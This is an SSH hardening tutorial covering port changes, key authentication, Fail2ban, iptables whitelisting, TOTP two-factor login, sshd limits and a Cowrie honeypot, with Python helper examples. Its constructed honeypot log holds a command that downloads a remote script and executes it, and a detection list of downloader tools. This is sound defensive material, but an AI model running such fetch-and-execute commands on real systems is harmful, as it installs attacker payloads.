7 Proven Ways to Harden SSH and Block Brute‑Force Attacks

This guide walks you through seven practical SSH hardening techniques—from changing the default port and disabling password logins to deploying Fail2ban, IP whitelisting, connection limits, two‑factor authentication, and a honeypot—showing why each step matters and how to implement it securely.

MaGe Linux Operations

As an experienced operations engineer, I have witnessed countless SSH brute-force attacks compromise poorly configured servers. Below are seven battle-tested methods that secure SSH and, applied together, reduce brute-force attacks from a daily threat to background noise.

Current Threat Landscape

A publicly exposed server typically receives 2000+ SSH login attempts per day, almost all of them automated.

90% of attacks target the default port 22.

Servers with weak passwords are compromised within 30 minutes.

Real‑world case: A compromised e‑commerce server led to a data leak of 100,000 users and losses exceeding $5 million.

Method 1: Change the Default SSH Port

Risk level: ⭐⭐⭐⭐⭐ Difficulty: ⭐

Most automated scanners probe only port 22, so moving SSH to a non-standard port removes the bulk of untargeted brute-force noise from your logs. It is obscurity, not security: a full port scan (masscan, Shodan-style crawlers) finds the new port in minutes, so treat this step as log hygiene and combine it with Methods 2 to 5.

# Edit SSH configuration
sudo vim /etc/ssh/sshd_config

# Change port (choose 1024-65535)
Port 2022

# Open the new port in the host firewall BEFORE restarting, or you lock yourself out
sudo ufw allow 2022/tcp                                                            # Ubuntu/Debian with ufw
sudo firewall-cmd --permanent --add-port=2022/tcp && sudo firewall-cmd --reload   # RHEL/CentOS with firewalld
sudo semanage port -a -t ssh_port_t -p tcp 2022                                    # RHEL/CentOS with SELinux enforcing

# Validate the config, then restart SSH service
sudo sshd -t && sudo systemctl restart sshd
# Ubuntu 22.10 and later socket-activate sshd (ssh.socket): run
# systemctl daemon-reload and restart ssh.socket as well, otherwise port 22 stays bound

Tip: Avoid ports used by common services (e.g., 80, 443, 3306); a four-digit port is recommended. Before closing your current session, open a second one to the new port and confirm sshd is bound where you expect (ss -tlnp | grep sshd).

Method 2: Disable Password Login and Enable Key Authentication

Risk level: ⭐⭐⭐⭐⭐ Difficulty: ⭐⭐

Public-key authentication is far stronger than passwords: the private key never leaves the client, the server only verifies a signature, and there is nothing human-chosen for a dictionary attack to guess.

Generate SSH Key Pair

# Generate key pair on client (Ed25519 is the current default choice;
# use -t rsa -b 4096 only if a legacy server cannot handle Ed25519)
ssh-keygen -t ed25519 -a 100 -C "comment such as user@laptop"

# Copy public key to server (using the new port)
ssh-copy-id -p 2022 user@server_ip

# Confirm key login works before disabling passwords
ssh -p 2022 -o PasswordAuthentication=no user@server_ip

Configure Server to Disable Passwords

# Edit SSH configuration (keep your current session open until a new one works)
sudo vim /etc/ssh/sshd_config

# Disable password authentication
PasswordAuthentication no
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
# Close the PAM back door, otherwise some distros still prompt for a password
# (use ChallengeResponseAuthentication no on OpenSSH older than 8.7)
KbdInteractiveAuthentication no
PermitRootLogin prohibit-password
# sshd uses the FIRST value it sees for a keyword: remove or comment any earlier
# "PasswordAuthentication yes" (including drop-ins under /etc/ssh/sshd_config.d/)
# instead of appending below it

# Validate, then restart service
sudo sshd -t && sudo systemctl restart sshd

The brute-force math changes completely: an 8-character password is at most on the order of 10¹⁴ guesses and usually far fewer, while RSA-4096 and Ed25519 each offer roughly 128 bits of security or more (about 3×10³⁸ guesses), so online guessing of a key is not a realistic attack. The residual risk moves to the client: protect the private key with a passphrase and 0600 permissions, and remove its public key from authorized_keys the moment the laptop is lost.

Method 3: Deploy Fail2ban for Dynamic Protection

Risk level: ⭐⭐⭐⭐ Difficulty: ⭐⭐⭐

Fail2ban monitors logs and automatically bans IPs that exceed failed‑login thresholds.

Install Fail2ban

# Ubuntu/Debian
sudo apt install fail2ban

# CentOS/RHEL (fail2ban is packaged in EPEL)
sudo yum install epel-release
sudo yum install fail2ban

Create SSH Jail Configuration

# Create custom config (jail.local overrides jail.conf; never edit jail.conf,
# package updates overwrite it)
sudo vim /etc/fail2ban/jail.local

[DEFAULT]
# Never ban your own management addresses (edit to your ranges)
ignoreip = 127.0.0.1/8 ::1 192.168.1.0/24

[sshd]
enabled = true
port = 2022
filter = sshd
# Debian/Ubuntu: /var/log/auth.log. RHEL/CentOS: /var/log/secure.
# Systems that log only to journald: drop logpath and set backend = systemd
logpath = /var/log/auth.log
maxretry = 3
bantime = 3600
findtime = 600

# Apply and confirm the jail is running
sudo systemctl enable --now fail2ban
sudo fail2ban-client status sshd

After configuration, any IP with three failed attempts within ten minutes is blocked for one hour. Check that the jail is actually watching the right log: `sudo fail2ban-client status sshd` lists the monitored file and the currently banned addresses; an empty file list means logpath or backend is wrong and nothing is being banned.
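To see the jail's rule in action before switching it on, here is an added example (not code from the article and not fail2ban's own filter) that counts failures per source IP inside a sliding findtime window over constructed auth.log lines and reports who would be banned, and that ignoreip really protects your admin hosts. Assumptions: syslog timestamps carry no year, so one is fixed in the code; only the two most common sshd failure messages are matched, where fail2ban's sshd filter knows many more.

```python
"""Replay the sshd jail's maxretry/findtime rule over auth.log lines.

Added example: not code from the article and not fail2ban's filter. It
applies the jail's rule (ban when maxretry failures from one IP fall inside
a findtime-second window) to constructed log lines.
"""
import re
from datetime import datetime

YEAR = 2024  # assumption: auth.log timestamps carry no year

FAIL_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?:Failed password for|Invalid user) .*?from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)

# Constructed sample (not real traffic): one fast attacker, one slow attacker
# that stays under the threshold, and an admin host that fat-fingers a
# password three times in a row.
SAMPLE_LOG = """\
Jan 10 10:00:01 web1 sshd[2301]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Jan 10 10:00:40 web1 sshd[2305]: Failed password for root from 203.0.113.5 port 51240 ssh2
Jan 10 10:01:15 web1 sshd[2309]: Invalid user test from 203.0.113.5 port 51251
Jan 10 10:05:00 web1 sshd[2320]: Failed password for root from 198.51.100.7 port 40001 ssh2
Jan 10 10:12:30 web1 sshd[2330]: Accepted publickey for operator from 192.168.1.10 port 50010 ssh2: ED25519 SHA256:constructed
Jan 10 10:20:00 web1 sshd[2340]: Failed password for root from 198.51.100.7 port 40002 ssh2
Jan 10 10:21:00 web1 sshd[2350]: Failed password for operator from 192.168.1.10 port 50011 ssh2
Jan 10 10:21:10 web1 sshd[2351]: Failed password for operator from 192.168.1.10 port 50012 ssh2
Jan 10 10:21:20 web1 sshd[2352]: Failed password for operator from 192.168.1.10 port 50013 ssh2
Jan 10 10:40:00 web1 sshd[2360]: Failed password for root from 198.51.100.7 port 40003 ssh2
"""


def parse_time(ts):
    return datetime.strptime(f"{YEAR} {ts}", "%Y %b %d %H:%M:%S")


def ban_candidates(log_text, maxretry=3, findtime=600, ignoreip=()):
    """Return [(ip, ban_time)] in the order the jail would ban them."""
    recent = {}      # ip -> failure times still inside the window
    banned = []
    for line in log_text.splitlines():
        m = FAIL_RE.search(line)
        if not m or m["ip"] in ignoreip:
            continue
        ip, t = m["ip"], parse_time(m["ts"])
        if any(b == ip for b, _ in banned):
            continue  # fail2ban already dropped this IP at the firewall
        # Sliding window: keep only failures younger than findtime seconds
        window = [h for h in recent.get(ip, []) if (t - h).total_seconds() < findtime]
        window.append(t)
        recent[ip] = window
        if len(window) >= maxretry:
            banned.append((ip, t))
    return banned


if __name__ == "__main__":
    for ip, when in ban_candidates(SAMPLE_LOG, ignoreip={"192.168.1.10"}):
        print(f"{when:%b %d %H:%M:%S} ban {ip}")
```

The slow attacker at 198.51.100.7 is never banned with the article's findtime of 600 seconds: spreading guesses 15 minutes apart is exactly how patient bots stay under fail2ban's radar, which is why the whitelist and key-only login in the next methods matter more than the thresholds.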

Method 4: Set Up SSH Login Whitelist

Risk level: ⭐⭐⭐ Difficulty: ⭐⭐

Restrict SSH access to trusted IP ranges using iptables or cloud security groups.

iptables Example

# Flush existing rules (use with caution: do this from the console, or with a
# rollback timer running in a second shell)
sudo iptables -F

# Allow loopback
sudo iptables -A INPUT -i lo -j ACCEPT

# Allow established connections (this is what keeps your current SSH session alive)
sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

# Allow specific IP range to new SSH port
sudo iptables -A INPUT -p tcp -s 192.168.1.0/24 --dport 2022 -j ACCEPT

# Drop other SSH traffic (rule order matters: this must come after the allow)
sudo iptables -A INPUT -p tcp --dport 2022 -j DROP

# Save rules (a plain ">" redirect runs as your user and fails on the root-owned
# file; Debian/Ubuntu need the iptables-persistent package, RHEL/CentOS use
# iptables-services and /etc/sysconfig/iptables instead)
sudo iptables-save | sudo tee /etc/iptables/rules.v4

Best for fixed office networks or VPN-based access. Before applying, start a rollback in a second shell (for example `sudo sh -c 'sleep 300; iptables -F'`) and kill it only once you have confirmed you can still log in, so a typo in the CIDR cannot lock you out. The rules above are IPv4 only: repeat them with ip6tables (and rules.v6) if the host has a public IPv6 address, otherwise the whitelist has a hole. On distributions that have moved to nftables the same iptables commands go through a compatibility layer; writing the equivalent nft rules directly is cleaner.

Method 5: Enable Two‑Factor Authentication (2FA)

Risk level: ⭐⭐⭐⭐⭐ Difficulty: ⭐⭐⭐⭐

Even if a private key is compromised, 2FA adds an extra verification layer: with AuthenticationMethods set to publickey,keyboard-interactive, sshd demands a valid key and then a valid one-time code, so a stolen key alone is not enough.

Install Google Authenticator

# Ubuntu/Debian
sudo apt install libpam-google-authenticator

# CentOS/RHEL (the package is in EPEL)
sudo yum install epel-release
sudo yum install google-authenticator

Configure 2FA for SSH

# Run configuration wizard as the user who will log in (not as root) and answer
# the prompts, or give the usual answers directly: -t time-based codes, -d refuse
# reuse of a code, -f write ~/.google_authenticator, -r 3 -R 30 rate-limit to
# three logins per 30 seconds, -w 3 accept the current code plus one step either side
google-authenticator -t -d -f -r 3 -R 30 -w 3

# Edit PAM configuration
sudo vim /etc/pam.d/sshd

# Add line at the top of the auth section (append "nullok" during a staged
# rollout so users who have not enrolled yet can still log in with their key)
auth required pam_google_authenticator.so
# Then comment out the distro's password include ("@include common-auth" on
# Debian/Ubuntu, "auth substack password-auth" on RHEL), otherwise sshd asks
# for the account password in addition to the code

Update sshd_config

sudo vim /etc/ssh/sshd_config

# Hand the second factor to PAM (ChallengeResponseAuthentication is the
# pre-8.7 name of the same option; either spelling works on current OpenSSH)
UsePAM yes
KbdInteractiveAuthentication yes
# Key first, then the code
AuthenticationMethods publickey,keyboard-interactive

# Validate and restart, keeping an existing session open
sudo sshd -t && sudo systemctl restart sshd

Users must now present their key and then a 6-digit code from the mobile app during login. The codes are time-based, so keep the server synchronised with NTP or chrony: a clock more than one step out of line rejects every code. Test the new login from a second terminal before closing the session you edited from, because a PAM mistake here locks everyone out.
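To make the 6-digit code less of a black box, here is an added example (not the article's code and not the pam_google_authenticator implementation) of the RFC 6238 TOTP computation behind it: HMAC-SHA1 over a 30-second counter, truncated to 6 digits, which is the default the PAM module and the phone apps agree on. The secret in ~/.google_authenticator is the base32 string on the file's first line. The sample key is the published RFC 4226/6238 test key, so the expected codes are the RFCs' own vectors; the verify function's ±1-step window is this example's choice and corresponds to the wizard's -w 3.

```python
"""RFC 6238 TOTP as used by Google Authenticator (HMAC-SHA1, 30 s, 6 digits).

Added example, not the article's code and not the PAM module's source.
"""
import base64
import hashlib
import hmac
import struct
import time

STEP = 30
DIGITS = 6


def hotp(key: bytes, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226: HMAC-SHA1(key, counter), dynamic truncation, mod 10^digits."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(key: bytes, unix_time: int, step: int = STEP) -> str:
    """TOTP = HOTP over the number of whole steps since the Unix epoch."""
    return hotp(key, unix_time // step)


def totp_from_base32(secret_b32: str, unix_time: int) -> str:
    """Decode the base32 secret as stored in ~/.google_authenticator (unpadded)."""
    s = secret_b32.strip().upper()
    return totp(base64.b32decode(s + "=" * (-len(s) % 8)), unix_time)


def verify(secret_b32: str, code: str, unix_time: int, window: int = 1) -> bool:
    """Accept the current step and +/- window steps to absorb clock skew.

    Comparison is constant-time. The PAM module additionally refuses to accept
    the same code twice (its DISALLOW_REUSE setting); this example omits that.
    """
    for offset in range(-window, window + 1):
        candidate = totp_from_base32(secret_b32, unix_time + offset * STEP)
        if hmac.compare_digest(candidate, code):
            return True
    return False


# The RFC 4226 test key "12345678901234567890", base32-encoded as the PAM
# module would store it (constructed for the example, not a real secret)
RFC_SECRET_B32 = base64.b32encode(b"12345678901234567890").decode()

if __name__ == "__main__":
    print("code for the RFC test key right now:", totp_from_base32(RFC_SECRET_B32, int(time.time())))
```

Two practical consequences fall out of the code: the secret file must be readable only by its owner (the wizard writes it 0400), because anyone who can read it can compute every future code; and the window is the only skew tolerance you get, so NTP is part of the 2FA deployment, not an afterthought.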

Method 6: Limit SSH Connections

Risk level: ⭐⭐⭐ Difficulty: ⭐⭐

These settings limit how many half-open connections a scanner can hold, how long an unauthenticated connection may live, how many guesses it gets, and which accounts are allowed to try at all.

sudo vim /etc/ssh/sshd_config

# Limit sessions
MaxSessions 3
# start:rate:full. With 10:30:100 (the sshd default) sshd refuses 30% of new
# unauthenticated connections once 10 are pending and all of them at 100. The
# article's 3:30:10 is tight enough that a few scanners parked on the port can
# make your own logins fail with "connection reset"; raise it if you see that.
MaxStartups 10:30:100
# Guesses per connection before sshd disconnects the client
MaxAuthTries 3

# Set timeouts
ClientAliveInterval 300
ClientAliveCountMax 2
LoginGraceTime 30

# Restrict users (with an AllowUsers list every account not on it is already
# refused, so the DenyUsers line is belt and braces)
AllowUsers admin operator
DenyUsers root guest
PermitRootLogin no

# Restart service
sudo systemctl restart sshd

Parameter explanations:
MaxSessions: maximum shells, commands or subsystems multiplexed over one network connection; it does not limit how many clients may connect.
MaxStartups start:rate:full: once "start" connections are waiting to authenticate, refuse new ones with probability "rate" percent, rising linearly to 100% at "full".
MaxAuthTries: authentication attempts allowed per connection before the client is disconnected; this is the real per-connection brute-force limit.
ClientAliveInterval and ClientAliveCountMax: after this many seconds of silence sshd sends a keepalive, and drops the session after that many unanswered keepalives (300 × 2 means idle sessions die after about ten minutes).
LoginGraceTime: seconds a connection may stay unauthenticated before sshd drops it, which frees the MaxStartups slots that scanners occupy.
AllowUsers/DenyUsers: sshd evaluates DenyUsers, then AllowUsers, then DenyGroups, then AllowGroups; with an AllowUsers list, every account not named is refused.
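Methods 1, 2 and 6 all edit sshd_config, and the most common way they fail silently is a parsing rule people do not know: for each keyword sshd uses the FIRST value it reads, so a `PasswordAuthentication no` appended below an earlier `yes` (or below an `Include` of drop-ins that set it) changes nothing. The following added example (not from the article or from OpenSSH) is a small auditor that reproduces that rule over a config file's text and reports which settings from those three methods are missing or ineffective. Assumptions and limits: only the global section is parsed (a Match block ends parsing because its directives are conditional, and Include files are not followed), durations must be plain seconds, the numeric thresholds are this example's choices, and the two sample configs are constructed. For the effective configuration on a real host always confirm with `sudo sshd -T`.

```python
"""Audit sshd_config text for the settings from Methods 1, 2 and 6.

Added example, not from the article or OpenSSH. Reproduces sshd's
first-value-wins rule and checks the global section only.
"""
import re

# OpenSSH defaults for the checked keywords when the file does not set them
DEFAULTS = {
    "port": "22",
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "permitemptypasswords": "no",
    "logingracetime": "120",
    "maxauthtries": "6",
}

# keyword -> accepted values (Methods 1 and 2)
EXPECTED = {
    "passwordauthentication": {"no"},
    "pubkeyauthentication": {"yes"},
    "permitrootlogin": {"no", "prohibit-password"},
    "permitemptypasswords": {"no"},
}

# keyword -> maximum allowed (Method 6); the limits are this example's choice
NUMERIC_MAX = {"logingracetime": 30, "maxauthtries": 3}

# "Keyword value" or "Keyword=value"
DIRECTIVE = re.compile(r"(\S+?)(?:\s*=\s*|\s+)(.*)$")


def parse_sshd_config(text):
    """Return {keyword_lower: value} with first-value-wins, stopping at Match."""
    values = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        if line.split()[0].lower() == "match":
            break                             # conditional section: out of scope
        m = DIRECTIVE.match(line)
        if not m:
            continue                          # keyword without a value
        values.setdefault(m.group(1).lower(), m.group(2).strip())  # first wins
    return values


def audit(text):
    """Return a list of findings; an empty list means the config passes."""
    cfg = parse_sshd_config(text)
    findings = []
    if cfg.get("port", DEFAULTS["port"]) == "22":
        findings.append("Method 1: sshd listens on the default port 22")
    for key, accepted in EXPECTED.items():
        got = cfg.get(key, DEFAULTS[key]).lower()
        if got not in accepted:
            findings.append(f"Method 2: {key} is '{got}', expected one of {sorted(accepted)}")
    for key, limit in NUMERIC_MAX.items():
        got = cfg.get(key, DEFAULTS[key])
        if not got.isdigit() or int(got) > limit:
            findings.append(f"Method 6: {key} is '{got}', expected a plain number <= {limit}")
    if "allowusers" not in cfg and "allowgroups" not in cfg:
        findings.append("Method 6: no AllowUsers/AllowGroups, every local account may attempt SSH")
    return findings


# Constructed sample: the hardening lines were appended below the stock ones
WEAK_CONFIG = """\
Include /etc/ssh/sshd_config.d/*.conf
Port 22
PasswordAuthentication yes
PermitRootLogin yes
# appended later; ignored by sshd because the first value wins
PasswordAuthentication no
PermitRootLogin no
"""

# Constructed sample: the same settings placed where they take effect
HARDENED_CONFIG = """\
Port 2022
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
PermitEmptyPasswords no
MaxAuthTries 3
LoginGraceTime 30
AllowUsers admin operator
Match User deploy
    PasswordAuthentication no
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(text) or ["OK"])
```

Run it against `sudo sshd -T` output as well as the file: the two disagreeing is the fastest way to spot a drop-in under /etc/ssh/sshd_config.d/ that overrides what you wrote.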

Method 7: Deploy an SSH Honeypot (Cowrie)

Risk level: ⭐⭐ Difficulty: ⭐⭐⭐⭐

A honeypot captures attacker behaviour for analysis. Run it beside the real service (after Method 1 it can take over port 22 while the real sshd sits on 2022) and treat everything it logs as hostile: no legitimate user has any reason to touch it, which makes its logs a noise-free source of addresses, credentials and tooling.

Install Cowrie

# Clone repository as a dedicated unprivileged user (Cowrie must never run as root)
git clone https://github.com/cowrie/cowrie.git
cd cowrie

# Install dependencies into a virtualenv, as the project's own docs do
python3 -m venv cowrie-env
. cowrie-env/bin/activate
pip install --upgrade pip
pip install -r requirements.txt

# Configure honeypot (settings in cowrie.cfg override cowrie.cfg.dist)
cp etc/cowrie.cfg.dist etc/cowrie.cfg
vim etc/cowrie.cfg

# Example SSH listen configuration (2222 is the default; an unprivileged
# process cannot bind port 22 directly)
[ssh]
listen_endpoints = tcp:2222:interface=0.0.0.0

# Start it, then redirect the now-free port 22 to the honeypot so scanners
# hit it instead of a closed port (the real sshd stays on 2022)
bin/cowrie start
sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222

Real‑time Monitoring Script (optional)

#!/bin/bash
# Tail the real sshd log and record/alert on each failed password attempt.
# This watches auth.log, not Cowrie (Cowrie writes its own logs under
# var/log/cowrie/); use /var/log/secure on RHEL/CentOS.
tail -F /var/log/auth.log | while read -r line; do
  if echo "$line" | grep -q "Failed password"; then
    ip=$(echo "$line" | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | head -n1)
    [ -n "$ip" ] || continue
    echo "$(date): Brute-force attempt from $ip" >> /var/log/ssh_attacks.log
    # Optional alert webhook: send valid JSON; $ip is safe to interpolate
    # because the grep above only ever yields digits and dots
    curl -sS -X POST "https://your-webhook-url" \
      -H 'Content-Type: application/json' \
      -d "{\"text\": \"SSH attack from $ip\"}"
  fi
done

Deploying a honeypot provides visibility into attack techniques and helps improve overall defenses.
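The visibility only pays off if someone reads the logs, so here is an added example (not from the article and not Cowrie's own tooling) that turns Cowrie's JSON log into the three things worth acting on: which credentials attackers try (candidates to ban or rotate on real hosts), who got "in" and what they ran, and the source addresses to feed back into the Method 4 whitelist's deny side or into fail2ban. Cowrie writes one JSON object per line to var/log/cowrie/cowrie.json; the field names used here (eventid, timestamp, src_ip, session, username, password, input) are the ones Cowrie emits for connection, login and command events. The log lines below are constructed to look like that output, not captured traffic, and the download address in them is from the documentation range.

```python
"""Summarize attacker activity from Cowrie's JSON log (cowrie.json).

Added example, not from the article or the Cowrie project. Sample lines are
constructed in Cowrie's format, not real captures.
"""
import json
from collections import Counter, defaultdict

SAMPLE_COWRIE_JSON = """\
{"eventid": "cowrie.session.connect", "timestamp": "2024-01-10T10:00:01.000000Z", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "message": "New connection: 203.0.113.5:51234"}
{"eventid": "cowrie.login.failed", "timestamp": "2024-01-10T10:00:03.000000Z", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "username": "root", "password": "123456", "message": "login attempt [root/123456] failed"}
{"eventid": "cowrie.login.failed", "timestamp": "2024-01-10T10:00:05.000000Z", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "username": "root", "password": "admin", "message": "login attempt [root/admin] failed"}
{"eventid": "cowrie.login.success", "timestamp": "2024-01-10T10:00:07.000000Z", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "username": "root", "password": "password", "message": "login attempt [root/password] succeeded"}
{"eventid": "cowrie.command.input", "timestamp": "2024-01-10T10:00:09.000000Z", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "input": "uname -a", "message": "CMD: uname -a"}
{"eventid": "cowrie.command.input", "timestamp": "2024-01-10T10:00:12.000000Z", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "input": "cd /tmp; wget http://198.51.100.200/x.sh; chmod +x x.sh; ./x.sh", "message": "CMD: cd /tmp; wget http://198.51.100.200/x.sh; chmod +x x.sh; ./x.sh"}
{"eventid": "cowrie.session.closed", "timestamp": "2024-01-10T10:00:15.000000Z", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "message": "Connection lost after 14 seconds"}
{"eventid": "cowrie.login.failed", "timestamp": "2024-01-10T10:03:00.000000Z", "src_ip": "198.51.100.7", "session": "0f0f0f0f0f0f", "username": "admin", "password": "admin", "message": "login attempt [admin/admin] failed"}
{"eventid": "cowrie.login.failed", "timestamp": "2024-01-10T10:03:02.000000Z", "src_ip": "198.51.100.7", "session": "0f0f0f0f0f0f", "username": "root", "password": "123456", "message": "login attempt [root/123456] failed"}
{"eventid": "cowrie.session.closed", "timestamp": "2024-01-10T10:03:04.000000Z", "src_ip": "198.51.100.7", "sess
"""


def load_events(text):
    """Parse JSON lines, skipping a truncated one (e.g. mid-write during rotation)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue   # do not let one bad line kill the whole report
    return events


def summarize(events):
    """Credentials tried, successful logins and per-session command history."""
    credentials = Counter()
    successes = []
    commands = defaultdict(list)
    for ev in events:
        eid = ev.get("eventid", "")
        if eid in ("cowrie.login.failed", "cowrie.login.success"):
            credentials[(ev["username"], ev["password"])] += 1
            if eid == "cowrie.login.success":
                successes.append((ev["src_ip"], ev["username"], ev["password"]))
        elif eid == "cowrie.command.input":
            commands[ev["session"]].append(ev["input"])
    return {"credentials": credentials, "successes": successes, "commands": dict(commands)}


def honeypot_sources(events):
    """Every IP that touched the honeypot, sorted. No legitimate client ever
    should, so this list can feed the real host's firewall or fail2ban."""
    return sorted({ev["src_ip"] for ev in events if "src_ip" in ev})


def downloader_sessions(summary):
    """Sessions whose commands fetch and run something: inspect these first."""
    return sorted(
        session for session, cmds in summary["commands"].items()
        if any(tool in c for c in cmds for tool in ("wget ", "curl ", "tftp "))
    )


if __name__ == "__main__":
    evs = load_events(SAMPLE_COWRIE_JSON)
    report = summarize(evs)
    print("top credentials:", report["credentials"].most_common(3))
    print("successful logins:", report["successes"])
    print("sessions that downloaded tooling:", downloader_sessions(report))
    print("sources to block:", honeypot_sources(evs))
```

The credential counter is the quiet win: the username/password pairs seen on the honeypot are exactly the ones to check against your real accounts (and to add to any password denylist), because the same bot will try them on port 2022 next.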

Final Recommendations

Implement the methods in order of difficulty: start with changing the port, enable key authentication, deploy Fail2ban, configure IP whitelisting, set connection limits, add 2FA, and finally consider a honeypot for advanced monitoring.

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.

Written by

MaGe Linux Operations

Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.
